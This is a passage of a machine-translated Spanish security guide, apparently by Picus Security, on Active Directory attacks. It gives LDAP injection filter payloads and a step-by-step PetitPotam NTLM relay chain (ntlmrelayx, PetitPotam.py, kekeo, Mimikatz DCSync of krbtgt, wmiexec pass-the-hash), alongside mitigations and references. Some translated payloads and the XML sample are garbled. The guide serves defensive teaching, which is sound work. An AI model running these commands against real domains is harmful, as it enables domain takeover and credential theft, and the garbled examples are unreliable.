Los ataques de inyección de LDAP se presentan de muchas formas, y algunas de ellas se tratan en este texto.
Si desea profundizar en el tema y obtener información sobre tipos adicionales de ataques de inyección LDAP
que no se mencionan aquí, siga este enlace [41].
Inyección LDAP Tipo 1: escalada de privilegios
El tema de la Elevación de Privilegios se refiere a la situación en la que los usuarios de bajo nivel de seguridad
pueden acceder a información de alto nivel de seguridad. Esto se consigue mediante el uso de una
inyección en forma de filtro que procesa el servidor LDAP.
Por ejemplo, el atacante puede apuntar a un directorio con documentos de bajo nivel de seguridad, como
"Información/Informes" e "Información/Próximos proyectos".
La inyección, en este caso, quedaría de la siguiente manera:
"Información)(nivel_de_seguridad=*))(&(directorio=documentos"
El filtro resultante de esta inyección sería el siguiente.
(&(directorio=Información)(nivel_seguridad=*))(&(directorio=Información)
(nivel_seguridad=bajo))
Como el servidor LDAP procesa solo el primer filtro, el segundo filtro se ignora y la consulta que se ejecuta
es "(&(directorio=Información)nivel de seguridad=*)". Esto le permite al atacante obtener acceso a una lista
de documentos que, de otro modo, solo serían accesibles para usuarios con un alto nivel de seguridad, aunque
el atacante no tenga los privilegios adecuados.
Técnica de ataque 6: Ataque de inyección LDAP 38
Machine Translated by Google
Inyección LDAP Tipo 2: Omisión de control de acceso
Todas las páginas de inicio de sesión contienen dos campos para la entrada del usuario, uno para el nombre de
usuario y otro para la contraseña. Las entradas están etiquetadas como USUARIO (nombre de usuario) y
CONTRASEÑA (contraseña). El cliente proporciona un par de nombre de usuario/contraseña y LDAP confirma la
existencia de este par construyendo filtros de búsqueda y enviándolos al servidor LDAP.
El filtro está escrito como (&(USER=Alice)(PASSWORD=PaSsW0rd!+). Sin embargo, un atacante puede manipular
esto ingresando un nombre de usuario válido e inyectando una secuencia después de él, omitiendo efectivamente
la verificación de contraseña. Al conocer el nombre de usuario, el atacante puede ingresar cualquier cadena como
el valor de la contraseña, lo que da como resultado que se envíe la siguiente consulta al servidor:
(&(USER=Alice)(PASSWORD=PaSsW0rd!+)
El servidor LDAP solo procesa el primer filtro, ignorando el segundo, lo que permite al atacante ingresar al
sistema sin una contraseña adecuada ya que la consulta (&(USER=Alice)(&)) siempre es correcta.
Inyección LDAP Tipo 3: Divulgación de información
Un explorador de recursos le permite al usuario ver qué recursos están disponibles en el sistema, como un sitio web
que vende ropa. Por ejemplo, un usuario puede buscar un artículo específico, como cuadernos o calcomanías,
para ver si están disponibles para la venta. Esto se hace mediante una consulta LDAP, como: (|(type=Notebooks)
(type=Stickers)).
Sin embargo, un pirata informático puede explotar esto inyectando la cadena "uid=*" en la consulta, lo que da como
resultado la siguiente consulta: (| (type=Notebooks)(uid=*))(type=Stickers)).
Esta consulta será procesada por el servidor LDAP, mostrando no solo todos los jeans disponibles sino también
todos los objetos de usuario en el sistema.
Técnica de ataque 6: Ataque de inyección LDAP 39
Machine Translated by Google
Técnicas de mitigación para un ataque de inyección LDAP
Hay un par de técnicas de mitigación para prevenir un posible ataque de inyección LDAP [42].
Técnica de mitigación 1: escapar de todas las variables usando la codificación LDAP correcta
Escapar de todas las variables usando la codificación LDAP correcta es una de las técnicas clave de mitigación
contra los ataques de inyección LDAP. Esta técnica implica la codificación de todas las entradas proporcionadas por
el usuario de una manera que dificulta que los atacantes inyecten cargas útiles maliciosas en las consultas LDAP.
Técnica de mitigación 2: escape de nombre distinguido
LDAP usa DN, o nombre distinguido, para almacenar e identificar nombres en su base de datos. Un DN
actúa como un identificador único, similar a un nombre de usuario, y se puede usar para acceder a los recursos.
Un DN se compone de varias partes, separadas por comas. Por ejemplo, un DN podría verse así [42]:
cn=Richard Feynman, ou=Departamento de Física, dc=Caltech, dc=edu
Ciertos caracteres en un DN se consideran caracteres especiales y deben escaparse o manejarse
correctamente para evitar problemas con el DN. La lista exhaustiva de caracteres especiales en un DN
"
incluye \ # + < > , ; = y espacios iniciales o finales.
Sin embargo, también hay caracteres "especiales" que se permiten en los nombres distinguidos y no es
&{ } ! '_
necesario escaparlos. Estos incluyen * ( ) . ~ | @ $ % ^ ? : . [ ] ̀
Es importante manejar adecuadamente los caracteres especiales en un DN para garantizar que el DN
funcione como se espera y para evitar problemas o consecuencias no deseadas al usar el DN.
Técnica de mitigación 3: Escape del filtro de búsqueda
En la base de datos LDAP, cada DN, o nombre distinguido, apunta de manera única a una sola entrada, que
se puede considerar como una fila en un sistema de administración de bases de datos relacionales (RDBMS).
Cada entrada contiene uno o más atributos, similares a las columnas en un RDBMS. Los filtros de
búsqueda se pueden utilizar para buscar en la base de datos LDAP y encontrar entradas con atributos específicos.
Los filtros de búsqueda utilizan la notación polaca, también conocida como notación de prefijo, para
especificar las condiciones de la búsqueda. Por ejemplo, el siguiente filtro de búsqueda devolvería todas las
entradas en la unidad organizativa de Física que tienen a Freeman Dyson o Albert Einstein como su gerente [42].
Técnica de ataque 6: Ataque de inyección LDAP 40
Machine Translated by Google
(&(ou=Física)(|(gerente=cn=Freeman
Dyson,ou=Física,dc=Caltech,dc=edu)(gerente=cn=Albert
Einstein,ou=Física,dc=Princeton,dc=edu)))
Al crear consultas LDAP en el código de la aplicación, es fundamental escapar de cualquier dato que no sea de
confianza que se agregue a la consulta para evitar problemas de seguridad. Hay dos formas de escape LDAP:
codificación para búsqueda LDAP y codificación para LDAP DN. La forma adecuada de escapar depende de si los
datos se utilizan en un filtro de búsqueda o como un DN como credencial para acceder
un recurso.
Los caracteres especiales como "(", ")" y "" se deben escapar correctamente cuando se usan en un filtro de
búsqueda para garantizar que la consulta se ejecute según lo previsto. Para obtener más información sobre el
escape del filtro de búsqueda, visite el documento RFC4515 [43].
Defensas Adicionales
Para proporcionar una capa adicional de protección contra los ataques de inyección de LDAP, las organizaciones
pueden implementar las siguientes medidas de defensa:
Privilegio mínimo: limite los privilegios asignados a la cuenta de enlace LDAP, que es la cuenta utilizada para
acceder al directorio LDAP, para minimizar el daño potencial en caso de un ataque exitoso.
Habilite la autenticación de enlace: configure el protocolo LDAP para que requiera la autenticación de enlace, que
verifica y autoriza las credenciales válidas pasadas por el usuario [44]. Sin embargo, los atacantes aún pueden eludir
la autenticación de enlace a través de Enlace anónimo [45] y Enlace no autenticado [46]. Por lo tanto,
estas opciones de vinculación también deben estar deshabilitadas.
Validación de entrada de la lista de permitidos: implemente técnicas de validación de entrada para detectar y evitar
que se pasen entradas no autorizadas a la consulta LDAP. Esto puede ayudar a garantizar que solo se utilicen
valores aprobados en la construcción de consultas LDAP, lo que reduce el riesgo de un ataque de inyección
LDAP exitoso. Estas técnicas de validación pueden incluir el uso de expresiones regulares, tipos de datos y
restricciones de longitud, y comprobaciones de referencias cruzadas con listas o bases de datos externas [47].
Técnica de ataque 6: Ataque de inyección LDAP 41
Machine Translated by Google
Técnica de ataque 7:
Ataque de retransmisión NTLM de PetitPotam en un activo
Servicios de certificados de directorio (AD CS)
El ataque de retransmisión NTLM de PetitPotam es un tipo de ciberataque que aprovecha el protocolo
heredado Windows NTLM y el protocolo MSEFSRPC . Este ataque se aprovecha de la configuración
predeterminada insegura de los Servicios de certificados de Active Directory (ADCS), que no aplica la
Protección extendida para la autenticación (EPA).
En este ataque, un atacante puede desencadenar una autenticación de controlador de dominio explotando
la vulnerabilidad de PetitPotam y retransmitiéndola al servidor ADCS para solicitar un certificado para la
cuenta del controlador de dominio. Con este certificado, el atacante puede recuperar un TGT (Ticket
Granting Ticket) para la cuenta del controlador de dominio retransmitido y realizar otras operaciones utilizando
sus altos privilegios. Esto puede conducir a un compromiso completo del dominio en unos pocos pasos y
potencialmente permitir que el atacante descargue los hashes de administración del dominio.
Es importante tener en cuenta que esta vulnerabilidad se mitigó parcialmente con una actualización de
seguridad lanzada por Microsoft el martes de parches, 10 de mayo de 2022, pero aún es posible un ataque
si un atacante tiene credenciales de cuenta de Active Directory.
Técnica de ataque 7: Ataque de retransmisión NTLM de PetitPotam en un servicio de certificados de Active Directory (AD CS) 42
Machine Translated by Google
Técnicas para realizar un ataque de retransmisión NTLM de PetitPotam en
Servicios de certificados de Active Directory (AC DC)
En el siguiente escenario, vamos a demostrar cómo un adversario puede explotar la vulnerabilidad de
PetitPotam para obtener privilegios completos de administrador de dominio sin necesidad de una autenticación
previa.
Un ataque típico de PetitPotam NTLM Relay consta de cinco pasos [48].
Paso 1: Retransmisión de la página web de inscripción de AD DC
En el primer paso, el atacante debe asegurarse de que ntlmrelay.px de Impacket esté configurado para retransmitir
a la página de inscripción web de AD DC.
sudo python3 ntlmrelayx.py debug smb2support objetivo
http://<targetip>/certsrv/certfnsh.asp adcs template KerberosAuthentication
…
[*] Configuración del servidor SMB
[*] Configuración del servidor HTTP
[*] Configuración del servidor WCF
[*] Servidores iniciados, esperando conexiones
Tenga en cuenta que el indicador "target" especifica la URL de destino para atacar. En este caso, el objetivo es
un punto de conexión del servidor de certificados. Los indicadores "adcs" y "template KerberosAuthentication"
indican que el destino es un servidor de Servicios de certificados de Active Directory (ADCS) y que la herramienta
utilizará una plantilla de autenticación específica. Los indicadores "debug" y "smb2support" son para fines de
depuración y compatibilidad con SMB versión 2, respectivamente.
Paso 2: Explotación de la vulnerabilidad de PetitPotam
Para explotar la vulnerabilidad de PetitPotam, ambos necesitamos especificar el DC y la IP del atacante.
PetitPotam.py se puede descargar desde su repositorio oficial de GitHub [49].
python3 Petitpotam.py <ip del oyente> <ip del destino>
Tenga en cuenta que, si bien la ip de escucha es la IP de retransmisión del atacante, la ip de destino es la IP del
controlador de dominio al que se dirige el atacante. Una vez que el adversario explota la vulnerabilidad de
PetitPotam, las credenciales se transmitirán al AD CD, donde se inscribirá el certificado.
Técnica de ataque 7: Ataque de retransmisión NTLM de PetitPotam en un servicio de certificados de Active Directory (AD CS) 43
Machine Translated by Google
... #Ver el primer paso.
[*] Servidores iniciados, esperando conexiones
...
[*] ¡CERTIFICADO OBTENIDO!
[*] Certificado Base64 del usuario DC101$:
MIIRXQIBAz...LUSHLJCNIKmzEStB/3еу<ZKk31GbxwDU8t8wtx0YayLkKaJB5/c/tanzuJ10r08obkt
/nzJeyQxgyurLwrPp8HAUYnBCG3vwBUkzxbxotRtlnHrzztzVc/SA....
Paso 3: Obtención de un Ticket de Otorgamiento de Tickets (TGT)
Ahora que está inscrito, el atacante puede usar este certificado para obtener un Ticket de concesión de tickets
(TGT). Para este paso, el atacante puede aprovechar la herramienta kekeo o Rubeus [50]:
Kekeo # base64 /entrada:en
. . .
Kekeo # tgt::ask /pfx:<certificado base64 del relé> /usuario:DC101$
/dominio:EJEMPLO.local /ptt
Este comando autentica con éxito al adversario con el dominio.
Paso 4: DCSyncing el usuario de destino
En este paso, el atacante puede usar Mimikatz para realizar un ataque DCSync en el usuario krbtgt .
lsadump::dcsync /dominio:EJEMPLO.local /usuario:krbtgt
Tenga en cuenta que con el comando, el atacante especifica el dominio al que
apuntar ("EJEMPLO.local") y el usuario a suplantar ("krbtgt"), que es una cuenta privilegiada en
Active Directory que se usa para realizar varias tareas administrativas, incluida la emisión Boletos
de Kerberos.
La función "lsadump::dcsync" , por otro lado, se utiliza para realizar un ataque "DCSync", que es un tipo
de ataque que permite a un atacante simular el comportamiento de un controlador de dominio y
recuperar hash de contraseña, tickets Kerberos y otra información confidencial de la base de datos
de Active Directory. Por lo tanto, al ejecutar este comando, el adversario obtiene el hash de la
contraseña del usuario krbtgt : 186c026974e59a14040dbc63aa8fb8c4.
Técnica de ataque 7: Ataque de retransmisión NTLM de PetitPotam en un servicio de certificados de Active Directory (AD CS) 44
Machine Translated by Google
Paso 5: Pasar el hash
En este paso, el adversario puede usar la herramienta wmiexec.py de Impacket para pasar el hash que obtuvo en el
quinto paso para obtener un shell interactivo en el controlador de dominio.
wmiexec.py hashes :186c026974e59a14040dbc63aa8fb8c4 EJEMPLO/krbtgt@<ipobjetivo>
En términos más simples, estos dos errores funcionan juntos para permitir que alguien con acceso limitado obtenga
rápidamente el control completo de una red o sistema. Incluso si la red o el sistema están completamente actualizados con
los últimos parches de seguridad, estos errores aún pueden usarse para causar daños graves en solo unos minutos.
Técnicas de mitigación para un ataque de retransmisión NTLM de PetitPotam en
Servicios de certificados de Active Directory (AD CS)
Para proteger las redes contra los ataques de retransmisión NTLM, los administradores de dominio deben tomar medidas
para proteger los servicios habilitados para la autenticación NTLM. La amenaza PetitPotam explota los servidores que
carecen de protección para los ataques de retransmisión NTLM en los servicios de certificados de Active Directory (AD CS).
Esta guía de mitigación proporciona pasos para que los clientes de AD CS protejan sus servidores de este tipo de ataque.
Si usa AD CS con los siguientes servicios, su red puede ser vulnerable:
• Inscripción web de autoridad certificadora • Servicio
web de inscripción de certificados.
Microsoft sugiere los siguientes pasos para mitigar posibles ataques en servidores AD CS [51]:
Paso 1: habilite la protección extendida para la autenticación (EPA) para la inscripción web de la autoridad de certificación
y el servicio web de inscripción de certificados. Esto se puede hacer a través del Administrador de Internet Information
Services (IIS), siendo "Requerido" la opción recomendada y más segura.
Paso 2: actualice el archivo Web.config creado por la función del servicio web de inscripción de certificados, ubicado en
<%windir%>\systemdata\CES<CA Name>_CES_Kerberos\web.config, para reflejar la configuración de EPA seleccionada.
Paso 3: Esto se puede hacer agregando <extendedProtectionPolicy> con un valor de "WhenSupported" o "Always",
según la configuración de EPA en la interfaz de usuario de IIS. La configuración "Siempre" se debe usar cuando la
configuración de EPA se establece en "Obligatorio".
Paso 4: habilite las conexiones solo SSL activando la opción "Requerir SSL" en el Administrador de IIS.
Técnica de ataque 7: Ataque de retransmisión NTLM de PetitPotam en un servicio de certificados de Active Directory (AD CS) 45
Machine Translated by Google
Figura 2. Habilitación de conexiones solo SSL en el Administrador de IIS [51]:
Paso 5: Después de completar estos pasos, es importante reiniciar IIS para cargar los cambios. Esto se puede hacer
abriendo una ventana elevada del símbolo del sistema y escribiendo el siguiente comando:
iisreset /reiniciar
Tenga en cuenta que este comando detiene todos los servicios de IIS y luego los reinicia.
Para obtener más información sobre las opciones disponibles para <extendedProtectionPolicy>, consulte el
<transporte> de <basicHttpBinding>. Se proporciona una configuración de muestra [51]:
<binding name="TransportWithHeaderClientAuth"> <modo de
seguridad="Transport">
<transporte clientCredentialType="Windows">
<extendedProtectionPolicy policyEnforcement="Siempre" /> </transporte>
<mensaje
clientCredentialType="Ninguno" establezcaSecurityContext="falso" negocieServiceCredential="falso" /
>
</seguridad>
<readerQuotas maxStringContentLength="131072" /> </binding>
Técnica de ataque 7: Ataque de retransmisión NTLM de PetitPotam en un servicio de certificados de Active Directory (AD CS) 46
Machine Translated by Google
Conclusión
En conclusión, la creciente frecuencia y sofisticación de los ataques dirigidos a Active Directory son
evidentes. Los ataques comunes discutidos en este informe, como Pass the Hash, Pass the Ticket,
Kerberoasting, Golden Ticket, DC Shadow, ASREP Roasting, LDAP Injection y PetitPotam NTLM Relay
Attack, ejemplifican las innumerables formas en que los adversarios pueden explotar las vulnerabilidades
dentro de un infraestructura de Active Directory de la organización.
Teniendo en cuenta el papel crucial que desempeña Active Directory en la regulación del
acceso a los datos y recursos confidenciales de una organización, es imperativo que las
organizaciones adopten medidas proactivas para defenderse de este tipo de ataques. Esto
requiere un enfoque de varias capas, que incorpore auditorías de seguridad regulares, evaluaciones de
vulnerabilidad y monitoreo continuo para detectar y abordar amenazas en tiempo real.
Es crucial reconocer que los atacantes adaptan constantemente sus tácticas, lo que requiere
que las organizaciones permanezcan alerta y actualicen constantemente sus medidas de seguridad
para adelantarse a las amenazas emergentes. Al invertir en medidas de seguridad integrales y monitorear
de cerca el panorama de amenazas en evolución, las organizaciones pueden mitigar el riesgo de ser
víctimas de un ataque de Active Directory.
El manual completo de seguridad de Active Directory 47
Machine Translated by Google
Referencias
[1] “[MSADTS]: Introducción”. [En línea]. Disponible:
https://learn.microsoft.com/enus/openspecs/windows_protocols/msadts/bacff5f19127
457b877cdb97b1e1802f. [Consultado: 10 de febrero de 2023]
[2] “Directorio Activo: ¿Qué es? ¿Por qué es importante?”, Intermedia | Intermedia, 10 de marzo de 2022.
[En línea]. Disponible:
https://www.intermedia.com/blog/queeseldirectorioactivoyporqueestanimportante/.
[Consultado: 10 de febrero de 2023]
[3] EB Abid, "Beneficios de Active Directory (pros y contras)", Servicios de infraestructura en la nube,
22 de agosto de 2021. [En línea]. Disponible:
https://cloudinfrastructureservices.co.uk/benefitsofactivedirectory/. [Consultado: 10 de febrero de 2023]
[4] "Beneficios de Microsoft 365 y Azure Active Directory para la gestión de identidades", Montra
Technologies, 22 de junio de 2022. [En línea]. Disponible:
https://montra.io/benefitsofmicrosoft365andazureactivedirectoryforidentityman
gestion/. [Consultado: 10 de febrero de 2023]
[5] "Informe DBIR 2022 Guía del maestro", Verizon Business. [En línea]. Disponible:
https://www.verizon.com/business/resources/reports/dbir/2022/masterguide/.
[Consultado: 10 de febrero de 2023]
[6] "Costo de un informe de violación de datos 2022". [En línea]. Disponible: https://
www.ibm.com/downloads/cas/3R8N1DZJ. [Consultado: 10 de febrero de 2023]
[7] "Comparar Active Directory con Azure Active Directory". [En línea]. Disponible:
https://learn.microsoft.com/enus/azure/activedirectory/fundamentals/activedirectory
compareazureadtoad. [Consultado: 10 de febrero de 2023]
[8] A. Robbins, "Cómo se mueven los atacantes de Azure Active Directory a AD local", The New
Stack, 26 de mayo de 2022. [En línea]. Disponible:
https://thenewstack.io/howattackersmovefromazureactivedirectorytoonpremad
/. [Consultado: 10 de febrero de 2023]
[9] "GitHub ParrotSec/mimikatz", GitHub. [En línea]. Disponible:
https://github.com/ParrotSec/mimikatz. [Consultado: 07 de febrero de 2023]
El manual completo de seguridad de Active Directory 48
Machine Translated by Google
[10]“GitHub Hackplayers/evilwinrm: El último shell de WinRM para hacking/pentesting,”
GitHub. [En línea]. Disponible: https://github.com/Hackplayers/evilwinrm. [Consultado: 07 de febrero de 2023]
[11] "ProcDump Sysinternals". [En línea]. Disponible:
https://learn.microsoft.com/enus/sysinternals/downloads/procdump. [Consulta: 07 de febrero de
2023]
[12]“gsecdump”. [En línea]. Disponible:
https://jpcertcc.github.io/ToolAnalysisResultSheet/detalles/gsecdump.htm. [Consultado: 07 de febrero de 2023]
[13]HC Yuceel, “La técnica de volcado de credenciales del sistema operativo MITRE ATT&CK T1003 y su
Adversary Use”, 23 de marzo de 2022. [En línea]. Disponible:
https://www.picussecurity.com/resource/themitreattckt1003oscredentialdumpingt
técnicaysuadversariouso. [Consultado: 07 de febrero de 2023]
[14] “5985,5986 Pentesting WinRM”. [En línea]. Disponible:
https://book.hacktricks.xyz/networkservicespentesting/59855986pentestingwinrm.
[Consultado: 07 de febrero de 2023]
[15] “mimikatz > sekurlsa::contraseñas de inicio de sesión”. [En línea]. Disponible:
https://jpcertcc.github.io/ToolAnalysisResultSheet/detalles/Mimikatz_sekurlsalogonpassw
ords.htm. [Consultado: 09 de febrero de 2023]
[16]“Detección de movimiento lateral mediante el seguimiento de registros de eventos”. [En línea]. Disponible:
https://www.jpcert.or.jp/english/pub/sr/20170612acir_research_en.pdf. [Consultado: 09 de febrero de 2023]
[17]J. Warren, “Cómo detectar ataques PasstheHash” [en línea]. Disponible:
https://blog.netwrix.com/2021/11/30/howtodetectpassthehashattacks/. [Consultado: 09 de febrero de 2023]
[18]“Mitigación de ataques PasstheHash (PtH) y otras técnicas de robo de credenciales
.” [En línea]. Disponible:
https://scadahacker.com/library/Documents/White_Papers/Microsoft%20%20Mitigación
%20PasstheHash%20(PtH)%20Ataques%20y%20Otros%20Credencial%20Robo%20T
echniques_Español.pdf. [Consultado: 09 de febrero de 2023]
[19]“GitHub gentilkiwi/kekeo: Una pequeña caja de herramientas para jugar con Microsoft Kerberos en C,” GitHub.
[En línea]. Disponible: https://github.com/gentilkiwi/kekeo. [Consultado: 07 de febrero de 2023]
[20] "GitHub GhostPack/Rubeus: tratando de domar al perro de tres cabezas", GitHub. [En línea].
Disponible: https://github.com/GhostPack/Rubeus. [Consultado: 07 de febrero de 2023]
El manual completo de seguridad de Active Directory 49
Machine Translated by Google
[Consultado: 07 de febrero de 2023]
Disponible: https://www.hackingarticles.in/adetailedguideonrubeus/. [Consultado: 07 de febrero de 2023]
[23] JasonGerend, "Descripción general de la autenticación Kerberos". [En línea]. Disponible:
https://learn.microsoft.com/enus/windowsserver/security/kerberos/kerberosauthentic
descripción general de la acción. [Consultado: 07 de febrero de 2023]
[24] "Kerberoast". [En línea]. Disponible:
https://www.thehacker.recipes/ad/movement/kerberos/kerberoast. [Acceso: 13 de enero de
2023]
[25] "Ataque Kerberoasting", Netwrix. [En línea]. Disponible:
https://www.netwrix.com/cracking_kerberos_tgs_tickets_using_kerberoasting.html.
[Consultado: 13 de enero de 2023]
[26] "Tutorial de ataque: cómo funciona el ataque Kerberoasting", Netwrix. [En línea]. Disponible:
https://www.youtube.com/watch?v=u6GwzBps6Lo. [Consultado: 13 de enero de 2023]
[27] “Truco n.º 18 de Active Directory de persistencia disimulada: colocar SPN en cuentas de administrador para el
Kerberoasting posterior”. [En línea]. Disponible: https://adsecurity.org/?p=3466. [Consultado: 09 de febrero de 2023]
[28] S. Metcalf, "Detecting Kerberoasting Activity", Active Directory Security, 5 de febrero de 2017.
[En línea]. Disponible: https://adsecurity.org/?p=3458. [Consultado: 09 de febrero de 2023]
[29] “Sitio web”. [En línea]. Disponible:
https://www.netwrix.com/cracking_kerberos_tgs_tickets_using_kerberoasting.html
[30] K. Mistele, “Impacket Deep Dives vol. 2: Atacando Kerberos Kyle Mistele,” Medio ,
05 de junio de 2021. [En línea]. Disponible:
https://kylemistele.medium.com/impacketdeepdivesvol2attackingkerberos922e8c
dd472a. [Consultado: 08 de febrero de 2023]
[31] “Ataque del boleto dorado”, Netwrix. [En línea]. Disponible:
https://www.netwrix.com/how_golden_ticket_attack_works.html. [Consultado: 08 de febrero de 2023]
[32] “Ataques con billetes de oro: cómo funcionan y cómo defenderse de ellos
,” Búsqueda. [En línea]. Disponible:
https://blog.quest.com/goldenticketattackshowtheyworkandhowtodefendagain
stellos/. [Consultado: 09 de febrero de 2023]
El manual completo de seguridad de Active Directory 50
Machine Translated by Google
[33] V. Navali, "Detección de un controlador de dominio no autorizado: ataque DCShadow", SentinelOne ,
15 de agosto de 2022. [En línea]. Disponible:
https://www.sentinelone.com/blog/detectingaroguedomaincontrollerdcshadowatta
ck/. [Consultado: 08 de febrero de 2023]
[34] "DCShadow Attack usando Mimikatz", Netwrix. [En línea]. Disponible:
https://www.netwrix.com/how_dcshadow_persistence_attack_works.html. [Accedido:
8 de febrero de 2023]
[35] “5136(S): Se modificó un objeto de servicio de directorio”, Microsoft. [En línea]. Disponible:
https://learn.microsoft.com/enus/windows/security/threatprotection/auditing/event513
6. [Acceso: 10 de febrero de 2023]
[36] “Detección de movimiento lateral a través de registros de eventos de seguimiento
.” [En línea]. Disponible: https://www.jpcert.or.jp/english/pub/sr/20170612acir_research_en.pdf.
[Consultado: 10 de febrero de 2023]
[37] "ASREP Tueste". [En línea]. Disponible:
https://viperone.gitbook.io/pentesttodo/todo/tododirectorioactivo/cr
edentialaccess/stealorforgekerberostickets/asreproasting. [Consulta: 08 de febrero de
2023]
Disponible: https://www.blumira.com/howtodetectasreproasting/. [Consultado: 08 de febrero de 2023]
[39] "ASREP Tueste". [En línea]. Disponible:
https://viperone.gitbook.io/pentesttodo/todo/tododirectorioactivo/cr
edentialaccess/stealorforgekerberostickets/asreproasting. [Consulta: 08 de febrero de
2023]
[40] J. Dibley, "Descifrado de contraseñas de Active Directory con ASREP Roasting" [en línea].
Disponible:
https://blog.netwrix.com/2022/11/03/cracking_ad_password_with_as_rep_roasting/.
[Consultado: 08 de febrero de 2023]
[41]A. Dizdar, "Guía completa para la inyección de LDAP: tipos, ejemplos y prevención" Brillante
Seguridad , 02 de junio de 2021. [En línea]. Disponible: https://brightsec.com/blog/ldapinjection/.
[Consultado: 09 de febrero de 2023]
[42] "Prevención de inyección LDAP Serie de hojas de trucos de OWASP". [En línea]. Disponible:
https://cheatsheetseries.owasp.org/cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet
.html. [Consultado: 09 de febrero de 2023]
El manual completo de seguridad de Active Directory 51
Machine Translated by Google
[43] T. Howes y MC Smith, “RFC ftietfldapbisfilter: acceso ligero a directorios
Protocolo (LDAP): Representación de cadenas de filtros de búsqueda,” IETF rastreador de datos, 08 de junio de 2006.
[En línea]. Disponible: https://datatracker.ietf.org/doc/html/rfc4515. [Consulta: 09 de febrero de
2023]
https://ldap.com/theldapbindoperation/. [Consultado: 09 de febrero de 2023]
[45] "3.4 El enlace anónimo en el servidor LDAP debe estar deshabilitado". [En línea]. Disponible:
https://www.tenable.com/audits/items/TNS_Oracle_WebLogic_10_Security_Guide_Linux.a
revisión:8bc4cb19c1fe0abfc3edcf804e7603f0. [Consultado: 09 de febrero de 2023]
[46] M.A. Moreau, “¿Por qué se deben deshabilitar los enlaces no autenticados de LDAP de Active Directory?
Y, cómo hacerlo," El Devoluciones Blog . [En línea]. Disponible:
https://blog.devolutions.net/2021/03/whyactivedirectoryldapunauthenticatedbindss
deberíadeshabilitarseycómohacerlo/. [Consultado: 09 de febrero de 2023]
[47] "Validación de entrada Serie de hojas de trucos de OWASP". [En línea]. Disponible:
https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html.
[Consultado: 09 de febrero de 2023]
[48] “De extraño a DA // Usando PetitPotam para retransmitir NTLM a Domain Administrato,”
Truesec . [En línea]. Disponible:
https://www.truesec.com/hub/blog/fromstrangertodausingpetitpotamtontlmrelay
al directorio activo. [Consultado: 09 de febrero de 2023]
[49] “GitHub topotam/PetitPotam: herramienta PoC para obligar a los hosts de Windows a autenticarse en
[51]“KB5005413: Mitigación de los ataques de retransmisión NTLM en los servicios de certificados de Active Directory (AD
CS).” [En línea]. Disponible:
https://support.microsoft.com/engb/topic/kb5005413mitigatingntlmrelayattackson
servicios de certificados de directorio activoadcs3612b77340434aa9b23db87910cd3429.
[Consultado: 09 de febrero de 2023]
El manual completo de seguridad de Active Directory 52
Machine Translated by Google
Acerca de
En Picus Security, ayudamos a las organizaciones a validar, medir y mejorar continuamente
la eficacia de sus controles de seguridad para que puedan evaluar los riesgos con mayor
precisión y fortalecer la resiliencia cibernética.
Como pionero de la simulación de brechas y ataques (BAS), los equipos de seguridad
de todo el mundo utilizan nuestra plataforma de validación de control de seguridad completa
para identificar de manera proactiva las brechas de seguridad y obtener información útil para
abordarlas.
www.picussecurity.com
picusseguridad
Seguridad Picus 2023. Reservados todos los derechos.